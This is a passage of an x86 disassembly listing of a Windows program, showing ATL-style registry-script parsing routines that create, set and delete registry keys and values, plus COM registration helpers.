lea ecx, [esp+1Ch+Memory]
push ecx
mov ecx, [esp+20h+var_4]
lea edx, [esp+20h+var_8]
push edx
call sub_402F50
test eax, eax
jnz short loc_403C72
loc_403C57: ; CODE XREF: sub_403BB0+62�j
; sub_403BB0+66�j
push ebx ; Memory
mov [esp+20h+var_C], 8007000Eh
call j_j__free
mov eax, [esp+20h+Memory]
push eax ; Memory
call j_j__free
add esp, 8
loc_403C72: ; CODE XREF: sub_403BB0+A5�j
mov ecx, [esp+1Ch+var_C]
pop edi
pop ebx
xor eax, eax
test ecx, ecx
pop esi
setnl al
pop ebp
add esp, 0Ch
retn 8
; ---------------------------------------------------------------------------
loc_403C87: ; CODE XREF: sub_403BB0+F�j
; sub_403BB0+1B�j
pop esi
xor eax, eax
pop ebp
add esp, 0Ch
retn 8
sub_403BB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CA0 proc near ; CODE XREF: sub_4050C0+39�p
; sub_4050C0:loc_40527F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_403D5F
mov eax, [ebp+arg_8]
test eax, eax
jz loc_403D5F
call off_412040
push edi
mov ebx, eax
mov [ebp+arg_4], 0
call ds:dword_40F040 ; lstrlenW
lea esi, [eax+eax+2]
cmp esi, 400h
jg short loc_403CFC
push esi
call sub_4010B0
add esp, 4
test al, al
jz short loc_403CFC
mov eax, esi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_403D05
; ---------------------------------------------------------------------------
loc_403CFC: ; CODE XREF: sub_403CA0+3C�j
; sub_403CA0+49�j
push esi
lea ecx, [ebp+arg_4]
call sub_4022E0
loc_403D05: ; CODE XREF: sub_403CA0+5A�j
push ebx
push esi
push edi
push eax
call sub_401240
test eax, eax
jnz short loc_403D29
lea ecx, [ebp+arg_4]
call sub_401C60
mov eax, 8007000Eh
lea esp, [ebp-0Ch]
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_403D29: ; CODE XREF: sub_403CA0+70�j
mov ecx, [ebp+arg_8]
push ecx ; int
mov ecx, [ebp+arg_0]
push eax ; Memory
add ecx, 4
call sub_403BB0
mov esi, eax
neg esi
sbb esi, esi
and esi, 7FF8FFF2h
lea ecx, [ebp+arg_4]
add esi, 8007000Eh
call sub_401C60
mov eax, esi
lea esp, [ebp-0Ch]
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_403D5F: ; CODE XREF: sub_403CA0+B�j
; sub_403CA0+16�j
mov eax, 80070057h
lea esp, [ebp-0Ch]
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_403CA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_403D70 proc near ; CODE XREF: sub_404100+205�p
; sub_404100+3DB�p
var_1110 = byte ptr -1110h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov eax, 1110h
lea ebp, [esp-6Ch]
call __alloca_probe
push ebx
push esi
push edi
lea eax, [ebp+6Ch+var_1110]
mov edi, ecx
xor esi, esi
push eax
mov [ebp+6Ch+var_8], edi
mov [ebp+6Ch+var_4], esi
call sub_401810
cmp eax, esi
jl loc_4040E2
lea ecx, [ebp+6Ch+var_4]
push ecx
lea edx, [ebp+6Ch+var_1110]
push edx
call sub_401650
add esp, 8
test eax, eax
jnz short loc_403DCE
mov eax, 80020009h
lea esp, [ebp-10B0h]
pop edi
pop esi
pop ebx
add ebp, 6Ch
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_403DCE: ; CODE XREF: sub_403D70+45�j
mov ecx, edi
call sub_4017B0
lea eax, [ebp+6Ch+var_1110]
push eax
mov ecx, edi
call sub_401810
cmp eax, esi
jl loc_4040E2
movzx eax, word ptr [ebp+6Ch+var_4]
cmp eax, 13h
jg loc_403FEB
jz loc_403F3E
cmp eax, 8
jz loc_403F22
cmp eax, 11h
jnz loc_4040CD
lea ecx, [ebp+6Ch+var_1110]
push ecx
call ds:dword_40F084 ; lstrlen
mov ebx, eax
test bl, 1
jnz short loc_403E63
cdq
sub eax, edx
mov esi, eax
sar esi, 1
push esi ; Size
lea ecx, [ebp+6Ch+var_110]
mov [ebp+6Ch+var_4], esi
mov [ebp+6Ch+var_110], 0
call sub_403000
mov edi, [ebp+6Ch+var_110]
test edi, edi
jnz short loc_403E7A
lea edx, [ebp+6Ch+var_10C]
test edx, edx
jz short loc_403E63
lea ecx, [ebp+6Ch+var_110]
call sub_401CD0
loc_403E63: ; CODE XREF: sub_403D70+B2�j
; sub_403D70+E6�j
mov eax, 80004005h
lea esp, [ebp-10B0h]
pop edi
pop esi
pop ebx
add ebp, 6Ch
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_403E7A: ; CODE XREF: sub_403D70+DC�j
mov ecx, esi
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
xor esi, esi
test ebx, ebx
rep stosb
jle short loc_403EDD
jmp short loc_403EA0
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
; ---------------------------------------------------------------------------
jmp short loc_403EA0
; ---------------------------------------------------------------------------
align 10h
loc_403EA0: ; CODE XREF: sub_403D70+122�j
; sub_403D70+12B�j ...
mov ecx, [ebp+6Ch+var_110]
xor edx, edx
mov dl, [ebp+esi+6Ch+var_1110]
mov eax, esi
shr eax, 1
lea edi, [eax+ecx]
push edx
call sub_401700
mov ecx, esi
and ecx, 1
shl ecx, 2
mov edx, ecx
mov ecx, 4
sub ecx, edx
mov dl, [edi]
shl al, cl
add esp, 4
or dl, al
inc esi
cmp esi, ebx
mov [edi], dl
jl short loc_403EA0
loc_403EDD: ; CODE XREF: sub_403D70+120�j
mov ecx, [ebp+6Ch+var_4]
mov edx, [ebp+6Ch+var_110]
mov eax, [ebp+6Ch+arg_0]
mov eax, [eax]
push ecx
mov ecx, [ebp+6Ch+arg_4]
push edx
push 3
push 0
push ecx
push eax
call ds:dword_40F010 ; RegSetValueExA
mov esi, eax
mov eax, [ebp+6Ch+var_110]
lea edx, [ebp+6Ch+var_10C]
cmp eax, edx
jz loc_4040A9
lea ecx, [ebp+6Ch+var_110]
call sub_401CD0
jmp loc_4040A9
; ---------------------------------------------------------------------------
loc_403F22: ; CODE XREF: sub_403D70+91�j
mov ecx, [ebp+6Ch+arg_4]
push 1
lea eax, [ebp+6Ch+var_1110]
push eax
push ecx
mov ecx, [ebp+6Ch+arg_0]
call sub_401560
mov esi, eax
jmp loc_4040A9
; ---------------------------------------------------------------------------
loc_403F3E: ; CODE XREF: sub_403D70+88�j
call off_412040
lea edx, [ebp+6Ch+var_1110]
push edx
mov ebx, eax
mov [ebp+6Ch+var_4], esi
call ds:dword_40F084 ; lstrlen
mov esi, eax
inc esi
lea edi, [esi+esi]
cmp edi, 400h
ja short loc_403F82
push edi
call sub_4010B0
add esp, 4
test al, al
jz short loc_403F82
mov eax, edi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_403F8B
; ---------------------------------------------------------------------------
loc_403F82: ; CODE XREF: sub_403D70+1F2�j
; sub_403D70+1FF�j
push edi
lea ecx, [ebp+6Ch+var_4]
call sub_4022E0
loc_403F8B: ; CODE XREF: sub_403D70+210�j
push ebx
push esi
lea ecx, [ebp+6Ch+var_1110]
push ecx
push eax
call sub_401200
test eax, eax
jnz short loc_403FBD
lea ecx, [ebp+6Ch+var_4]
call sub_401C60
mov eax, 8007000Eh
lea esp, [ebp-10B0h]
pop edi
pop esi
pop ebx
add ebp, 6Ch
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_403FBD: ; CODE XREF: sub_403D70+22C�j
lea edx, [ebp+6Ch+var_C]
push edx
push 0
push 0
push eax
call ds:dword_40F198
mov eax, [ebp+6Ch+var_C]
mov ecx, [ebp+6Ch+arg_4]
push eax
push ecx
mov ecx, [ebp+6Ch+arg_0]
call sub_401540
lea ecx, [ebp+6Ch+var_4]
mov esi, eax
call sub_401C60
jmp loc_4040A9
; ---------------------------------------------------------------------------
loc_403FEB: ; CODE XREF: sub_403D70+82�j
cmp eax, 4008h
jnz loc_4040CD
lea edx, [ebp+6Ch+var_1110]
push edx
call ds:dword_40F084 ; lstrlen
inc eax
push eax ; Size
lea ecx, [ebp+6Ch+var_110]
mov [ebp+6Ch+var_110], esi
call sub_403000
mov edi, [ebp+6Ch+var_110]
cmp edi, esi
jz short loc_40408F
mov al, [ebp+6Ch+var_1110]
test al, al
lea esi, [ebp+6Ch+var_1110]
jz short loc_40406F
mov ebx, ds:dword_40F230
loc_404036: ; CODE XREF: sub_403D70+2FD�j
push esi
call ebx ; CharNextA
mov cl, [esi]
cmp cl, 5Ch
jnz short loc_404050
cmp byte ptr [eax], 30h
jnz short loc_404050
mov byte ptr [edi], 0
push eax
inc edi
call ebx ; CharNextA
mov esi, eax
jmp short loc_40406A
; ---------------------------------------------------------------------------
loc_404050: ; CODE XREF: sub_403D70+2CE�j
; sub_403D70+2D3�j
xor eax, eax
mov [edi], cl
mov al, [esi]
push eax
call ds:dword_40F0C4 ; IsDBCSLeadByte
test eax, eax
jz short loc_404068
mov cl, [esi+1]
inc edi
inc esi
mov [edi], cl
loc_404068: ; CODE XREF: sub_403D70+2EF�j
inc edi
inc esi
loc_40406A: ; CODE XREF: sub_403D70+2DE�j
cmp byte ptr [esi], 0
jnz short loc_404036
loc_40406F: ; CODE XREF: sub_403D70+2BE�j
mov eax, [ebp+6Ch+arg_4]
mov ecx, [ebp+6Ch+arg_0]
mov byte ptr [edi], 0
mov edx, [ebp+6Ch+var_110]
push edx
push eax
call sub_401590
mov edi, [ebp+6Ch+var_110]
mov esi, eax
jmp short loc_404094
; ---------------------------------------------------------------------------
loc_40408F: ; CODE XREF: sub_403D70+2AE�j
mov esi, 0Eh
loc_404094: ; CODE XREF: sub_403D70+31D�j
lea ecx, [ebp+6Ch+var_10C]
cmp edi, ecx
jz short loc_4040A9
lea ecx, [ebp+6Ch+var_110]
call sub_401CD0
loc_4040A9: ; CODE XREF: sub_403D70+19C�j
; sub_403D70+1AD�j ...
test esi, esi
jz short loc_4040C8
push esi
call sub_401400
add esp, 4
lea esp, [ebp-10B0h]
pop edi
pop esi
pop ebx
add ebp, 6Ch
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_4040C8: ; CODE XREF: sub_403D70+33B�j
mov edi, [ebp+6Ch+var_8]
xor esi, esi
loc_4040CD: ; CODE XREF: sub_403D70+9A�j
; sub_403D70+280�j
mov edx, [ebp+6Ch+arg_8]
push edx
mov ecx, edi
call sub_401810
xor ecx, ecx
cmp eax, esi
setnl cl
dec ecx
and eax, ecx
loc_4040E2: ; CODE XREF: sub_403D70+2A�j
; sub_403D70+75�j
lea esp, [ebp-10B0h]
pop edi
pop esi
pop ebx
add ebp, 6Ch
mov esp, ebp
pop ebp
retn 0Ch
sub_403D70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404100 proc near ; CODE XREF: sub_404100+13C�p
; sub_404100+494�p ...
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_208 = byte ptr -208h
var_104 = byte ptr -104h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 21Ch
mov eax, [esp+21Ch+arg_C]
push ebx
push esi
push edi
mov edi, [esp+228h+arg_0]
push edi
mov ebx, ecx
mov [esp+22Ch+var_218], 0
mov [esp+22Ch+var_210], eax
call sub_401810
mov esi, eax
test esi, esi
jge short loc_40413D
pop edi
pop esi
pop ebx
add esp, 21Ch
retn 10h
; ---------------------------------------------------------------------------
loc_40413D: ; CODE XREF: sub_404100+2F�j
cmp byte ptr [edi], 7Dh
push ebp
jz loc_4046B6
jmp short loc_404150
; ---------------------------------------------------------------------------
align 10h
loc_404150: ; CODE XREF: sub_404100+47�j
; sub_404100+160�j
mov esi, ds:dword_40F088
push offset aDelete ; "Delete"
push edi
mov [esp+234h+var_21C], 1
call esi ; lstrcmpi
mov ebp, eax
neg ebp
push offset aForceremove ; "ForceRemove"
sbb ebp, ebp
push edi
inc ebp
call esi ; lstrcmpi
test eax, eax
jz short loc_404181
test ebp, ebp
jz loc_40426B
loc_404181: ; CODE XREF: sub_404100+77�j
push edi
mov ecx, ebx
call sub_401810
mov esi, eax
test esi, esi
jl loc_4046A7
mov eax, [esp+22Ch+arg_8]
xor esi, esi
cmp eax, esi
jz loc_40426D
mov cl, [edi]
test cl, cl
mov [esp+22Ch+var_214], esi
mov eax, edi
jz short loc_4041CC
loc_4041B0: ; CODE XREF: sub_404100+C0�j
cmp cl, 5Ch
jz short loc_4041C4
push eax
call ds:dword_40F230 ; CharNextA
mov cl, [eax]
test cl, cl
jnz short loc_4041B0
jmp short loc_4041CC
; ---------------------------------------------------------------------------
loc_4041C4: ; CODE XREF: sub_404100+B3�j
cmp eax, esi
jnz loc_4046C5
loc_4041CC: ; CODE XREF: sub_404100+AE�j
; sub_404100+C2�j
push edi
mov ecx, ebx
call sub_401950
test eax, eax
jz short loc_4041F1
mov ecx, [esp+22Ch+arg_4]
mov [esp+22Ch+var_214], ecx
push edi
lea ecx, [esp+230h+var_214]
call sub_401EF0
mov [esp+22Ch+var_214], esi
loc_4041F1: ; CODE XREF: sub_404100+D6�j
cmp ebp, esi
jz short loc_40426D
push edi
mov ecx, ebx
call sub_401810
mov esi, eax
test esi, esi
jl loc_4046E9
push edi
mov ecx, ebx
call sub_4019E0
mov esi, eax
test esi, esi
jl loc_4046E9
loc_404219: ; CODE XREF: sub_404100+212�j
; sub_404100+3CB�j ...
cmp byte ptr [edi], 7Bh
jnz short loc_40425D
push edi
call ds:dword_40F084 ; lstrlen
cmp eax, 1
jnz short loc_40425D
mov eax, [esp+22Ch+arg_8]
mov ecx, [esp+22Ch+var_218]
push 0
push eax
push ecx
push edi
mov ecx, ebx
call sub_404100
mov esi, eax
test esi, esi
jl loc_4046A7
push edi
mov ecx, ebx
call sub_401810
mov esi, eax
test esi, esi
loc_404257: ; CODE XREF: sub_404100+2A2�j
jl loc_4046A7
loc_40425D: ; CODE XREF: sub_404100+11C�j
; sub_404100+128�j ...
cmp byte ptr [edi], 7Dh
jnz loc_404150
jmp loc_4046A7
; ---------------------------------------------------------------------------
loc_40426B: ; CODE XREF: sub_404100+7B�j
xor esi, esi
loc_40426D: ; CODE XREF: sub_404100+9E�j
; sub_404100+F3�j
push offset aNoremove ; "NoRemove"
push edi
call ds:dword_40F088 ; lstrcmpi
test eax, eax
jnz short loc_404295
push edi
mov ecx, ebx
mov [esp+230h+var_21C], eax
call sub_401810
mov esi, eax
test esi, esi
jl loc_4046A7
xor esi, esi
loc_404295: ; CODE XREF: sub_404100+17B�j
push offset aVal ; "Val"
push edi
call ds:dword_40F088 ; lstrcmpi
test eax, eax
jnz loc_4043A7
lea edx, [esp+22Ch+var_104]
push edx
mov ecx, ebx
call sub_401810
mov esi, eax
test esi, esi
jl loc_4046A7
push edi
mov ecx, ebx
call sub_401810
mov esi, eax
test esi, esi
jl loc_4046A7
cmp byte ptr [edi], 3Dh
jnz loc_4046CE
mov eax, [esp+22Ch+arg_8]
xor ebp, ebp
cmp eax, ebp
jz short loc_404339
mov eax, [esp+22Ch+arg_4]
push edi
lea ecx, [esp+230h+var_104]
push ecx
lea edx, [esp+234h+var_21C]
push edx
mov ecx, ebx
mov [esp+238h+var_21C], eax
call sub_403D70
mov esi, eax
cmp esi, ebp
mov [esp+22Ch+var_21C], ebp
jge loc_404219
lea ecx, [esp+22Ch+var_21C]
call sub_401ED0
lea ecx, [esp+22Ch+var_218]
call sub_401ED0
pop ebp
pop edi
mov eax, esi
pop esi
pop ebx
add esp, 21Ch
retn 10h
; ---------------------------------------------------------------------------
loc_404339: ; CODE XREF: sub_404100+1E8�j
cmp [esp+22Ch+arg_C], ebp
jnz short loc_404396
cmp [esp+22Ch+var_21C], ebp
jz short loc_404396
mov eax, [esp+22Ch+arg_4]
push 20006h
push ebp
push eax
lea ecx, [esp+238h+var_21C]
mov [esp+238h+var_21C], ebp
call sub_4014F0
cmp eax, ebp
jnz loc_404693
mov esi, [esp+22Ch+var_21C]
lea ecx, [esp+22Ch+var_104]
push ecx
push esi
call ds:dword_40F004 ; RegDeleteValueA
cmp eax, ebp
jz short loc_40438B
cmp eax, 2
jnz loc_404693
loc_40438B: ; CODE XREF: sub_404100+280�j
cmp esi, ebp
jz short loc_404396
push esi
call ds:dword_40F020 ; RegCloseKey
loc_404396: ; CODE XREF: sub_404100+240�j
; sub_404100+246�j ...
push edi
mov ecx, ebx
call sub_4019E0
mov esi, eax
cmp esi, ebp
jmp loc_404257
; ---------------------------------------------------------------------------
loc_4043A7: ; CODE XREF: sub_404100+1A3�j
mov cl, [edi]
test cl, cl
mov eax, edi
jz short loc_4043CC
nop
loc_4043B0: ; CODE XREF: sub_404100+2C0�j
cmp cl, 5Ch
jz short loc_4043C4
push eax
call ds:dword_40F230 ; CharNextA
mov cl, [eax]
test cl, cl
jnz short loc_4043B0
jmp short loc_4043CC
; ---------------------------------------------------------------------------
loc_4043C4: ; CODE XREF: sub_404100+2B3�j
cmp eax, esi
jnz loc_4046CE
loc_4043CC: ; CODE XREF: sub_404100+2AD�j
; sub_404100+2C2�j
cmp [esp+22Ch+arg_8], esi
jz loc_4044EF
mov eax, [esp+22Ch+arg_4]
lea edx, [esp+22Ch+var_21C]
push edx
push 2001Fh
push esi
push edi
push eax
mov [esp+240h+var_21C], esi
call ds:dword_40F00C ; RegOpenKeyExA
cmp eax, esi
jnz short loc_40441E
mov ecx, [esp+22Ch+var_218]
xor eax, eax
cmp ecx, esi
jz short loc_40440C
push ecx
call ds:dword_40F020 ; RegCloseKey
loc_40440C: ; CODE XREF: sub_404100+303�j
cmp eax, esi
mov ecx, [esp+22Ch+var_21C]
mov [esp+22Ch+var_218], ecx
jz loc_4044B6
xor esi, esi
loc_40441E: ; CODE XREF: sub_404100+2F9�j
mov eax, [esp+22Ch+arg_4]
lea edx, [esp+22Ch+var_21C]
push edx
push 20019h
push esi
push edi
push eax
mov [esp+240h+var_21C], esi
call ds:dword_40F00C ; RegOpenKeyExA
cmp eax, esi
jnz short loc_40445D
mov ecx, [esp+22Ch+var_218]
xor eax, eax
cmp ecx, esi
jz short loc_404451
push ecx
call ds:dword_40F020 ; RegCloseKey
loc_404451: ; CODE XREF: sub_404100+348�j
cmp eax, esi
mov ecx, [esp+22Ch+var_21C]
mov [esp+22Ch+var_218], ecx
jz short loc_4044B6
loc_40445D: ; CODE XREF: sub_404100+33E�j
mov ecx, [esp+22Ch+arg_4]
lea edx, [esp+22Ch+var_20C]
push edx
lea eax, [esp+230h+var_21C]
push eax
push 0
push 2001Fh
push 0
push 0
push 0
push edi
push ecx
mov [esp+250h+var_21C], 0
call ds:dword_40F000 ; RegCreateKeyExA
mov esi, eax
test esi, esi
jnz loc_4046EF
mov ecx, [esp+22Ch+var_218]
test ecx, ecx
jz short loc_4044A4
push ecx
call ds:dword_40F020 ; RegCloseKey
loc_4044A4: ; CODE XREF: sub_404100+39B�j
test eax, eax
mov edx, [esp+22Ch+var_21C]
mov esi, eax
mov [esp+22Ch+var_218], edx
jnz loc_4046EF
loc_4044B6: ; CODE XREF: sub_404100+316�j
; sub_404100+35B�j
push edi
mov ecx, ebx
call sub_401810
mov esi, eax
test esi, esi
jl loc_4046A7
cmp byte ptr [edi], 3Dh
jnz loc_404219
push edi
push 0
lea eax, [esp+234h+var_218]
push eax
mov ecx, ebx
call sub_403D70
mov esi, eax
test esi, esi
jl loc_4046A7
jmp loc_404219
; ---------------------------------------------------------------------------
loc_4044EF: ; CODE XREF: sub_404100+2D3�j
cmp [esp+22Ch+arg_C], esi
jnz loc_4045F2
mov edx, [esp+22Ch+arg_4]
lea ecx, [esp+22Ch+var_214]
push ecx
push 20019h
push esi
push edi
push edx
mov [esp+240h+var_214], esi
call ds:dword_40F00C ; RegOpenKeyExA
cmp eax, esi
jnz short loc_404537
mov ecx, [esp+22Ch+var_218]
xor eax, eax
cmp ecx, esi
jz short loc_40452F
push ecx
call ds:dword_40F020 ; RegCloseKey
loc_40452F: ; CODE XREF: sub_404100+426�j
mov ecx, [esp+22Ch+var_214]
mov [esp+22Ch+var_218], ecx
loc_404537: ; CODE XREF: sub_404100+41C�j
cmp eax, esi
mov ebp, eax
jz short loc_404548
loc_40453D: ; CODE XREF: sub_404100+4F7�j
mov [esp+22Ch+arg_C], 1
loc_404548: ; CODE XREF: sub_404100+43B�j
push 104h
push edi
lea edx, [esp+234h+var_208]
push edx
call ds:dword_40F09C ; lstrcpyn
push edi
mov ecx, ebx
call sub_401810
mov esi, eax
test esi, esi
jl loc_4046A7
push edi
mov ecx, ebx
call sub_4019E0
mov esi, eax
test esi, esi
jl loc_4046A7
cmp byte ptr [edi], 7Bh
jnz short loc_4045C0
mov eax, [esp+22Ch+arg_C]
mov ecx, [esp+22Ch+var_218]
push eax
push 0
push ecx
push edi
mov ecx, ebx
call sub_404100
mov esi, eax
test esi, esi
jge short loc_4045AE
mov eax, [esp+22Ch+arg_C]
test eax, eax
jz loc_4046A7
loc_4045AE: ; CODE XREF: sub_404100+49D�j
push edi
mov ecx, ebx
call sub_401810
mov esi, eax
test esi, esi
jl loc_4046A7
loc_4045C0: ; CODE XREF: sub_404100+480�j
cmp ebp, 2
mov edx, [esp+22Ch+var_210]
mov [esp+22Ch+arg_C], edx
jz loc_40425D
test ebp, ebp
mov eax, edx
jz short loc_4045FC
test eax, eax
jnz loc_40425D
push ebp
call sub_401400
add esp, 4
mov esi, eax
jmp loc_4046A7
; ---------------------------------------------------------------------------
loc_4045F2: ; CODE XREF: sub_404100+3F6�j
mov ebp, 2
jmp loc_40453D
; ---------------------------------------------------------------------------
loc_4045FC: ; CODE XREF: sub_404100+4D8�j
test eax, eax
jz short loc_404643
mov eax, [esp+22Ch+var_218]
push eax
mov ecx, ebx
call sub_401990
test eax, eax
jz short loc_404643
lea ecx, [esp+22Ch+var_208]
push ecx
mov ecx, ebx
call sub_401950
test eax, eax
jz loc_40425D
mov eax, [esp+22Ch+var_21C]
test eax, eax
jz loc_40425D
lea edx, [esp+22Ch+var_208]
push edx
lea ecx, [esp+230h+var_218]
call sub_401EF0
jmp loc_40425D
; ---------------------------------------------------------------------------
loc_404643: ; CODE XREF: sub_404100+4FE�j
; sub_404100+50E�j
mov eax, [esp+22Ch+var_218]
test eax, eax
jz short loc_404664
push eax
call ds:dword_40F020 ; RegCloseKey
mov ebp, eax
test ebp, ebp
mov [esp+22Ch+var_218], 0
jnz loc_40470E
loc_404664: ; CODE XREF: sub_404100+549�j
mov eax, [esp+22Ch+var_21C]
test eax, eax
jz loc_40425D
mov edx, [esp+22Ch+arg_4]
lea ecx, [esp+22Ch+var_208]
push ecx
push edx
call ds:dword_40F008 ; RegDeleteKeyA
test eax, eax
mov [esp+22Ch+var_21C], 0
jz loc_40425D
loc_404693: ; CODE XREF: sub_404100+265�j
; sub_404100+285�j
push eax
call sub_401400
add esp, 4
mov esi, eax
lea ecx, [esp+22Ch+var_21C]
loc_4046A2: ; CODE XREF: sub_404100+5ED�j
call sub_401ED0
loc_4046A7: ; CODE XREF: sub_404100+8D�j
; sub_404100+145�j ...
mov eax, [esp+22Ch+var_218]
test eax, eax
jz short loc_4046B6
push eax
call ds:dword_40F020 ; RegCloseKey
loc_4046B6: ; CODE XREF: sub_404100+41�j
; sub_404100+5AD�j
pop ebp
pop edi
mov eax, esi
pop esi
pop ebx
add esp, 21Ch
retn 10h
; ---------------------------------------------------------------------------
loc_4046C5: ; CODE XREF: sub_404100+C6�j
lea ecx, [esp+22Ch+var_214]
call sub_401ED0
loc_4046CE: ; CODE XREF: sub_404100+1D7�j
; sub_404100+2C6�j
lea ecx, [esp+22Ch+var_218]
call sub_401ED0
pop ebp
pop edi
pop esi
mov eax, 80020009h
pop ebx
add esp, 21Ch
retn 10h
; ---------------------------------------------------------------------------
loc_4046E9: ; CODE XREF: sub_404100+101�j
; sub_404100+113�j
lea ecx, [esp+22Ch+var_214]
jmp short loc_4046A2
; ---------------------------------------------------------------------------
loc_4046EF: ; CODE XREF: sub_404100+38F�j
; sub_404100+3B0�j
lea ecx, [esp+22Ch+var_218]
call sub_401ED0
push esi
call sub_401400
add esp, 4
pop ebp
pop edi
pop esi
pop ebx
add esp, 21Ch
retn 10h
; ---------------------------------------------------------------------------
loc_40470E: ; CODE XREF: sub_404100+55E�j
lea ecx, [esp+22Ch+var_218]
call sub_401ED0
push ebp
call sub_401400
add esp, 4
pop ebp
pop edi
pop esi
pop ebx
add esp, 21Ch
retn 10h
sub_404100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404730 proc near ; CODE XREF: sub_405320+5C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
mov edi, [esp+4+arg_0]
test edi, edi
jnz short loc_404742
mov eax, 80070057h
pop edi
retn 0Ch
; ---------------------------------------------------------------------------
loc_404742: ; CODE XREF: sub_404730+7�j
mov ecx, [edi+0Ch]
push ebx
push ebp
mov ebp, [edi+8]
xor eax, eax
cmp ebp, ecx
push esi
jnb short loc_40479A
loc_404751: ; CODE XREF: sub_404730+64�j
mov ebx, [ebp+0]
test ebx, ebx
jz short loc_40478C
mov esi, [esp+10h+arg_8]
test esi, esi
jz short loc_404771
mov edi, [ebx]
mov ecx, 4
xor edx, edx
repe cmpsd
mov edi, [esp+10h+arg_0]
jnz short loc_40478C
loc_404771: ; CODE XREF: sub_404730+2E�j
push 1
call dword ptr [ebx+4]
test eax, eax
jl short loc_4047AD
push 1
call dword ptr [ebx+1Ch]
push eax
mov eax, [ebx]
push eax
call sub_402B60
test eax, eax
jl short loc_4047AD
loc_40478C: ; CODE XREF: sub_404730+26�j
; sub_404730+3F�j
mov ecx, [edi+0Ch]
add ebp, 4
cmp ebp, ecx
jb short loc_404751
test eax, eax
jl short loc_4047AD
loc_40479A: ; CODE XREF: sub_404730+1F�j
mov ecx, [esp+10h+arg_4]
test ecx, ecx
jz short loc_4047AD
mov ecx, [edi+4]
push 0
push ecx
call sub_402A90
loc_4047AD: ; CODE XREF: sub_404730+48�j
; sub_404730+5A�j ...
pop esi
pop ebp
pop ebx
pop edi
retn 0Ch
sub_404730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4047C0 proc near ; CODE XREF: sub_4053B0+6B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
mov edi, [esp+4+arg_0]
test edi, edi
jnz short loc_4047D2
mov eax, 80070057h
pop edi
retn 0Ch
; ---------------------------------------------------------------------------
loc_4047D2: ; CODE XREF: sub_4047C0+7�j
mov ecx, [edi+0Ch]
push ebx
push ebp
mov ebp, [edi+8]
xor eax, eax
cmp ebp, ecx
push esi
jnb short loc_40482A
loc_4047E1: ; CODE XREF: sub_4047C0+64�j
mov ebx, [ebp+0]
test ebx, ebx
jz short loc_40481C
mov esi, [esp+10h+arg_8]
test esi, esi
jz short loc_404801
mov edi, [ebx]
mov ecx, 4
xor edx, edx
repe cmpsd
mov edi, [esp+10h+arg_0]
jnz short loc_40481C
loc_404801: ; CODE XREF: sub_4047C0+2E�j
push 0
call dword ptr [ebx+1Ch]
push eax
mov eax, [ebx]
push eax
call sub_402B60
test eax, eax
jl short loc_40483D
push 0
call dword ptr [ebx+4]
test eax, eax
jl short loc_40483D
loc_40481C: ; CODE XREF: sub_4047C0+26�j
; sub_4047C0+3F�j
mov ecx, [edi+0Ch]
add ebp, 4
cmp ebp, ecx
jb short loc_4047E1
test eax, eax
jl short loc_40483D
loc_40482A: ; CODE XREF: sub_4047C0+1F�j
mov ecx, [esp+10h+arg_4]
test ecx, ecx
jz short loc_40483D
mov ecx, [edi+4]
push 0
push ecx
call sub_4029F0
loc_40483D: ; CODE XREF: sub_4047C0+51�j
; sub_4047C0+5A�j ...
pop esi
pop ebp
pop ebx
pop edi
retn 0Ch
sub_4047C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404850 proc near ; CODE XREF: WinMain(x,x,x,x)+16A�p
arg_0 = dword ptr 4
push ebx
xor ebx, ebx
push esi
mov esi, ecx
mov [esi+4], ebx
mov [esi+14h], ebx
lea ecx, [esi+24h]
mov [esi+18h], ebx
mov [esi+1Ch], ebx
mov dword ptr [esi], offset off_40F66C
call sub_409050
mov eax, [esp+8+arg_0]
mov [esi+20h], eax
mov [esi+60h], ebx
mov [esi+50h], bl
mov eax, esi
pop esi
pop ebx
retn 4
sub_404850 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404890 proc near ; DATA XREF: .rdata:off_40F66C�o
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_14]
test eax, eax
push esi
